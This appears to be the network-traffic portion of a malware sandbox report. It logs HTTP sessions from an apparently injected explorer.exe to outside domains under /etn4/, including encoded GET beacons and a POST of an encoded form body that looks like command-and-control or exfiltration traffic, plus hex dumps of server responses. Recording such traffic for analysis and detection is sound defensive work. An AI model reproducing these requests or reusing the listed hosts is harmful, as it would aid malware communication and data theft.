                                                Aug 8, 2022 16:11:20.450714111 CEST11249INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 14:11:20 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://reprograme-se10x.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Content-Length: 14456
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed b2 eb 92 e3 c6 b1 35 fa db fd 14 35 54 48 43 da 2c 10 e0 b5 1b 6c b6 2d c9 b2 3e 47 58 de 0e 8d bc bf 38 61 3b 26 8a 40 02 a8 e9 42 15 5c 55 e0 65 e8 3e 7f f7 73 7c 71 7e 9c 77 38 7f fd 62 27 0b e0 ad bb c1 be cd 8c e4 bd ad e9 21 59 95 95 b9 72 e5 ca 75 f9 ea b7 ff f1 f5 0f ff d7 9f be 21 99 cd c5 d5 d9 a5 fb 21 82 c9 74 d6 2a 2c fd d3 0f 2d 17 03 16 5f 9d fd e2 32 07 cb 48 94 31 6d c0 ce 5a 7f fe e1 77 f4 bc 45 7a fb 17 c9 72 98 b5 16 1c 96 85 d2 b6 45 22 25 2d 48 cc 5c f2 d8 66 b3 18 16 3c 02 5a 5d ba 84 4b 6e 39 13 d4 44 4c c0 2c a8 70 8e 60 5e 6b 35 57 d6 bc de 83 bc ce d9 8a f2 9c a5 40 0b 0d ae 49 28 98 4e e1 75 55 68 b9 15 70 f5 a7 7f fe 9f 94 4b 44 f8 e7 ff a3 08 48 57 aa 59 cc c8 17 9f 9d f7 83 60 4a be 87 42 ab 54 23 3e 35 40 80 fc e7 37 7f fc e7 7f 7d e9 5d f6 ea f2 b3 4b c1 e5 35 d1 20 66 af 63 69 5c 9f 04 6c 94 bd 26 19 9e 66 af 7b 3d 7d 0c 10 f8 2b 2f 52 79 4d e0 b1 4a e3 2d 3d a5 d3 3b c9 2d 26 2c 68 c9 2c b4 88 5d 17 a8 1e 2b 0a c1 23 66 b9 92 3d 6d cc af 56 b9 c0 27 47 6f d6 3a 41 9f 7c a1 d9 df 4b 35 25 bf 03 88 5b 75 c7 56 66 6d 61 c2 66 c6 bd 04 13 7b ad 4f 4d 85 c4 80 db cb 71 79 ff fc 3f 9a 2b f3 24 6a f8 71 15 e6 98 a3 89 34 2f ec d5 d9 92 cb 58 2d bd b7 cb 02 72 f5 8e bf 01 6b b9 4c 0d 99 91 4d 6b ce 0c fc 59 8b 56 b8 85 ff 6b ef af 3b cd ff da ab 6c 63 fe 8a e0 1a fe da ab 8a ff da 0b 86 9e ef f9 7f ed 4d fa ab 49 ff af bd 56 b7 05 2b 8b f5 5e 21 53 bc 98 45 fa 32 3c 2c ac d0 f0 f7 9b 1a 10 4f ee ae 4a 1d 41 2b dc b4 d0 97 28 6b 55 b6 c5 af e0 9b f4 f8 6b 6f 59 50 2e 23 51 c6 ae e1 3b 53 05 aa 52 8a 5b 03 9c da cb b9 f4 de 99 5f 2f 40 cf c6 48 21 68 dd dc 4c cf 7a bf 7c 45 7e c8 b8 21 09 17 40 f0 97 95 56 d1 14 24 68 6c 1d 93 5f f6 ce 5e 25 a5 8c dc 76 db d0 65 5d db d9 2c 98 26 b2 ab bb aa cb 67 cc 8b 34 60 e6 37 02 dc 3e da ad 88 c9 05 33 ad 4e b7 98 71 2f 05 fb b5 92 16 05 fb e2 8b e3 5b bb d5 8f 5b 9d e9 0e 98 18 84 de 02 b3 d9 1b ab 71 5d 5e a2 55 fe 75 c6 f4 d7 2a 86 2e cc da 85 17 e1 1c fa 7b 88 6c db ef fa 5d ee 2d 79 6c 33 fc cd 80 a7 99 c5 8e 1e 0e 21 7e 70 f8 cc 73 ae 5c b7 2d 8e d6 85 0e a6 fb 1d cc b4 ea b7 cc b2 3f 7f ff 87 76 a7 33 d5 60 4b 2d c9 cb 71 ed 16 17 66 b3 d9 2d ec 9b fd 60 51 1b ea b1 ec 7d a5 6a bb a2 0c d6 33 3a 9a a1 02 5e 0c 09 6e c7 7a 76 5d c0 ac e5 94 ea bd 63 28 67 9d d9 65 4e c2 6d bd f9 6a fd 03 4b ff 88 2e 68 b7 32 60 28 e7 5f fc bf 39 76 20 e3 af 33 2e e2 b6 45 1e 4a b7 d5 ec 4b ad d9 ba dd 4a 04 73 fe aa fd d4 c1 6e a6 2c 0a a5 ad 99 6d 00 4d b1 c6 99 64 1a be f2 bb 87 db 37 ab 08 0a fb 3b 2c c4 f8 4d 57 cf fc a9 be 54 9e 00 99 da 6c aa 7f f5 ab ce 01 e5 2f ea 2f fa 6f 7f 9b 1d cc d2 d9 f0 a4 fd aa f8 c7 3f 5e 1d 04 ec d4 a2 bf 0a a6 66 c9 6d 94 e1 56 dd 94 5f a1 3f 05 97 6e 66 55 b4 9c e0 e8 93 59 6b ec fb 64 d0 2f 56 e4 4b cd 99 68 e1 22 37 11 66 d6 93 84 db fd 99
                                                Data Ascii: 55THC,l->GX8a;&@B\Ue>s|q~w8b'!Yru!!t*,-_2H1mZwEzrE"%-H\f<Z]Kn9DL,p`^k5W@I(NuUhpKDHWY`JBT#>5@7}]K5 fci\l&f{=}+/RyMJ-=;-&,h,]+#f=mV'Go:A|K5%[uVfmaf{OMqy?+$jq4/X-rkLMkYVk;lcMIV+^!SE2<,OJA+(kUkoYP.#Q;SR[_/@H!hLz|E~!@V$hl_^%ve],&g4`7>3Nq/[[q]^Uu*.{l]-yl3!~ps\-?v3`K-qf-`Q}j3:^nzv]c(geNmjK.h2`(_9v 3.EJKJsn,mMd7;,MWTl//o?^fmV_?nfUYkd/VKh"7f
                                                Aug 8, 2022 16:11:20.450750113 CEST11250INData Raw: f6 5f 82 fe e4 e2 7c d2 1d 8f fc c1 45 f7 bc ef 8f ba 17 e7 17 a3 fa fe b7 ee bd e7 c1 f1 73 e7 d7 af 82 f0 15 82 8c 46 83 d1 b8 3b 1a 9f f7 f1 7b 77 0e 5c fd f1 4b 55 7e fc dc f9 e2 8b a3 ea c9 60 d0 c7 87 a0 7f 8e df c3 fe e0 70 0e ce 8f e2 c1
                                                Data Ascii: _|EsF;{w\KU~`p<C|z;w2;L+kl%~UI|1LNJZ;);)o,5F^fq;t(},^^x5bYRr%q,?kn;7
                                                Aug 8, 2022 16:11:20.450776100 CEST11251INData Raw: 8a ea a0 01 6b 9d 31 b6 e6 7a 68 c4 3a e5 39 fd 1f 95 b8 56 e6 39 c0 da 6d fa 19 73 55 aa 83 8c 1f 9c 6c 97 f4 0c 0a 4f 1c ed 79 c8 a6 60 11 ba 1e ec 12 40 3e 63 c8 5b 75 0f 4e 7a 2b b3 91 14 f1 32 66 68 94 71 11 93 70 99 81 86 76 53 da db b7 a6
                                                Data Ascii: k1zh:9V9msUlOy`@>c[uNz+2fhqpvS K)i;9SJPBKvzV(FF=2UnZsQ(e..JLL:V3E" 7|KxXK2p[&B-wXM*?]5%V~y
                                                Aug 8, 2022 16:11:20.450803995 CEST11253INData Raw: b0 38 e6 32 0d fb 1a f2 a9 5a 80 4e 04 9a 96 95 56 4d df 53 2e 63 58 85 81 ef fe bd 94 dd 4b ec b6 25 45 9d e5 23 26 a2 b6 63 47 7e 45 fa c3 62 d5 39 b0 5c 70 c3 e7 02 a6 4f 98 ff e0 59 a9 dc cf 93 4c 52 3b 8b 47 75 d0 80 b5 48 aa bb 55 ee 39 a6
                                                Data Ascii: 82ZNVMS.cXK%E#&cG~Eb9\pOYLR;GuHU9PA?^%JRwT;2m}(1BR*?*e\iwDAUuL9RL3ifCVZ5]fQ-@'B-C.LLs.ib5-a.<AW{,L}>f.
                                                Aug 8, 2022 16:11:20.450856924 CEST11254INData Raw: 15 b2 d2 aa ea 54 e5 a0 04 ee 07 75 5a ed 7a fb fe e7 0d b8 82 cd 41 6c 1e 4c e1 b2 28 ed de 5e e7 45 dd 90 e2 2e 97 61 30 3d 4c 37 c0 51 ee 6f f4 62 e8 fe 3e e2 2e 4e 69 4d 95 14 6b 72 d2 7e c7 8e b9 bf b0 93 a0 b5 ee 0d b0 77 16 b2 93 67 88 f2
                                                Data Ascii: TuZzAlL(^E.a0=L7Qob>.NiMkr~wgwmLpPb^1Jt'4balTi+>?Fv{x3S'T!+9P.rvo.{\]VZ541BPY,6P:'M)<A
                                                Aug 8, 2022 16:11:20.450884104 CEST11255INData Raw: db 04 6c 38 1a 9e 37 67 19 88 94 8c eb bc 24 81 7e 74 c2 12 16 b4 e5 75 da ef c6 ee ef 4e 1a 3a 34 e6 20 ed 3d 89 a8 55 77 74 10 5c 02 d3 fb 8a 76 30 18 c5 90 76 75 3a 67 ed 71 37 18 4e ba fd fe a4 1b 74 88 ff b9 0b b6 83 d1 a8 7b 1e 60 70 d8 21
                                                Data Ascii: l87g$~tuN:4 =Uwt\v0vu:gq7Nt{`p!9Qp;}{{;qL?#Q?noR<!~Q}cUks7Y{pyw9x`|R\2SS@du?p2^C#V!cbP
                                                Aug 8, 2022 16:11:20.450927019 CEST11257INData Raw: c6 59 a2 0a 2e b7 96 1a f8 fe 8b 3d 66 b9 5c 77 a6 37 59 ff 27 18 27 e5 29 93 96 47 1f 71 1c 93 33 21 dc 3c 83 9f 60 9e ac 4c e1 13 ac 66 f8 29 46 b9 55 5b d3 5f 51 c1 f4 27 99 60 f4 bc 09 d6 c6 42 5e c5 9e 4e 3e 87 98 97 f9 1d ee 93 0f e0 2e 95
                                                Data Ascii: Y.=f\w7Y'')Gq3!<`Lf)FU[_Q'`B^N>.F/uVZI0(@G5~&RB&f#!1P5*-6Yt]s*scT3>Vyh|IxFU#4O0C#>)O<,r?`51)h535
                                                Aug 8, 2022 16:11:20.450953960 CEST11258INData Raw: b5 8a 0e 31 94 4a a3 77 ea c8 12 78 9a d9 b0 ef fb e4 c2 f7 eb 58 cc 4d 21 d8 3a 4c d0 60 ce c6 53 a3 a3 50 a8 88 89 f6 7d e0 4e 97 94 5a b4 5f f7 90 63 84 d5 20 6d cf 66 90 83 e9 d9 25 5e d6 bb 6f d5 63 06 c5 30 bd 6a 8c de 5d 15 7a 35 72 05 3c
                                                Data Ascii: 1JwxXM!:L`SP}NZ_c mf%^oc0j]z5r<O9I[$n.6vHnY~_Q}.GB]bv_N7B2ufmz`YTy+<~=kC54/,Ame$q'r%{K/{W
                                                Aug 8, 2022 16:11:20.450980902 CEST11260INData Raw: bb 76 97 05 37 7c ce 05 b7 eb 90 64 3c 8e 41 4e 49 a1 0c 77 bb 08 09 9b 1b 25 4a 0b 53 22 20 b1 21 a1 17 f8 af 58 4d 89 5a 80 4e 84 5a ee 8b 5a e4 ea 12 27 33 57 97 09 17 16 34 e1 f1 ac 85 42 c4 a5 b2 d8 8f c6 4c 5f 53 5c dd da 44 4c 40 0b d3 e0
                                                Data Ascii: v7|d<ANIw%JS" !XMZNZZ'3W4BL_S\DL@k%YWj<Skj |W-b3K0Q:qAxA0yq"p7?h&M<+])DSY\|l;o_ZK|0 AkcY*ujVd<jUfhY-L
                                                Aug 8, 2022 16:11:20.451008081 CEST11261INData Raw: fb fe c7 f1 bd 81 48 c9 18 6f 3f db fe 03 6d ef 7b e7 e7 e3 fe 64 38 f2 2f ce fd c1 45 ff 08 e7 ab 87 71 76 18 c1 64 3c 9c 20 ce a4 aa 0f 46 63 87 37 3a c2 f9 f2 01 9c 60 cb bc d7 20 d6 5e 41 f4 12 10 2e fb b3 d6 1b 55 ea 08 be d5 ac c8 78 d4 22
                                                Data Ascii: Ho?m{d8/Eqvd< Fc7:` ^A.Ux"[JK<Nrn/~E-Ko9N{}]:+-"41QQiVr[,s.]MAp!asDiaJ$6$)QP}C=J=,h\*hy2S|/
                                                Aug 8, 2022 16:11:20.595535994 CEST11262INData Raw: 7d c8 1d df cf dd 32 cb fa bb 82 8c 19 6a 61 65 29 13 3c 95 34 42 59 40 b7 88 b1 6b 01 b3 56 82 58 d4 f0 f7 10 62 7a 5e b4 87 1a f2 2e 19 fa 8b 65 97 f4 7d bc 74 a6 55 ca 12 78 9a d9 b0 ef fb 53 94 1e 68 56 df 83 d6 d5 d0 1f e2 60 fd ad 24 c7 df
                                                Data Ascii: }2jae)<4BY@kVXbz^.e}tUxShV`$~!NwRD*K@U#5^^F0e\&JD+7I"9LV~9S<{~Ti{Z'jzi p248M.6TWDVhRqu'wR@-6yV


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.649799108.167.169.5680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:22.296473980 CEST11263OUTGET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1
                                                Host: www.reprograme-se10x.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:22.554661036 CEST11264INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 14:11:22 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.649800192.185.131.23880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:27.756026030 CEST11265OUTPOST /etn4/ HTTP/1.1
                                                Host: www.tadeumilhosrp.com
                                                Connection: close
                                                Content-Length: 418
                                                Cache-Control: no-cache
                                                Origin: http://www.tadeumilhosrp.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.tadeumilhosrp.com/etn4/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 63 52 76 74 35 78 54 68 3d 79 54 52 71 74 42 46 70 58 5f 6b 4e 44 76 44 76 77 58 43 2d 77 7a 57 53 6b 71 71 37 68 4f 4e 62 51 51 69 61 46 4b 49 56 74 37 6d 63 34 6d 51 70 4f 5f 54 63 5a 48 43 51 48 6f 4c 49 62 2d 56 6f 57 67 6c 49 54 56 6f 68 7a 6c 64 6c 37 6c 36 46 28 36 51 4c 6e 69 55 74 4b 64 49 39 50 55 34 67 6e 6e 70 35 63 34 6e 59 44 51 7a 63 45 43 32 76 5a 45 6e 4a 67 74 6f 70 42 41 35 49 51 5f 28 31 35 48 77 7a 48 72 64 47 48 6b 4a 34 32 54 63 5a 4f 37 76 67 6c 6e 70 63 42 74 70 63 72 66 4b 5f 56 69 36 48 4c 68 49 78 35 5f 69 44 74 51 46 34 51 6f 6b 33 41 65 75 5f 36 6a 49 66 6e 36 54 69 75 53 39 46 66 4a 4d 6a 78 6f 42 6c 63 59 76 65 43 75 74 66 7a 4f 69 4e 73 41 68 6f 47 7a 42 33 49 6f 44 47 30 54 37 48 6b 45 58 33 4e 32 58 32 66 48 7a 68 4d 64 49 69 37 67 39 54 6c 63 28 38 79 69 65 35 77 65 67 50 64 62 42 37 72 55 68 61 61 30 28 5a 6e 35 49 6c 53 39 6c 69 67 6d 69 59 6f 70 78 69 65 5a 42 32 61 77 50 73 38 53 6a 53 76 62 61 73 5a 52 63 55 4f 51 37 4b 36 55 6c 5a 78 43 76 6d 6f 42 4d 71 61 4d 44 4d 49 58 62 6f 56 39 61 72 52 7a 36 37 33 53 33 4c 38 2d 6b 57 43 32 5a 66 6a 30 77 73 4a 68 46 76 4f 74 47 39 28 53 4f 47 33 68 56 79 6c 37 74 4f 4d 32 35 62 6a 4d 74 50 32 38 28 77 54 69 63 42 76 74 30 57 30 39 35 6e 47 71 67 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: cRvt5xTh=yTRqtBFpX_kNDvDvwXC-wzWSkqq7hONbQQiaFKIVt7mc4mQpO_TcZHCQHoLIb-VoWglITVohzldl7l6F(6QLniUtKdI9PU4gnnp5c4nYDQzcEC2vZEnJgtopBA5IQ_(15HwzHrdGHkJ42TcZO7vglnpcBtpcrfK_Vi6HLhIx5_iDtQF4Qok3Aeu_6jIfn6TiuS9FfJMjxoBlcYveCutfzOiNsAhoGzB3IoDG0T7HkEX3N2X2fHzhMdIi7g9Tlc(8yie5wegPdbB7rUhaa0(Zn5IlS9ligmiYopxieZB2awPs8SjSvbasZRcUOQ7K6UlZxCvmoBMqaMDMIXboV9arRz673S3L8-kWC2Zfj0wsJhFvOtG9(SOG3hVyl7tOM25bjMtP28(wTicBvt0W095nGqg.
                                                Aug 8, 2022 16:11:27.891092062 CEST11267INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Mon, 08 Aug 2022 14:11:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 3650
                                                Connection: close
                                                ETag: "616e0979-e42"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; } h1 strong { font-weight:
                                                Aug 8, 2022 16:11:27.891113043 CEST11268INData Raw: 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #
                                                Aug 8, 2022 16:11:27.891132116 CEST11269INData Raw: 72 61 74 6f 72 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20
                                                Data Ascii: rator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is dist


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.649802192.185.131.23880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:29.950834990 CEST11270OUTGET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1
                                                Host: www.tadeumilhosrp.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:30.095088959 CEST11275INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Mon, 08 Aug 2022 14:11:30 GMT
                                                Content-Type: text/html
                                                Content-Length: 3650
                                                Connection: close
                                                ETag: "616e0979-e42"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 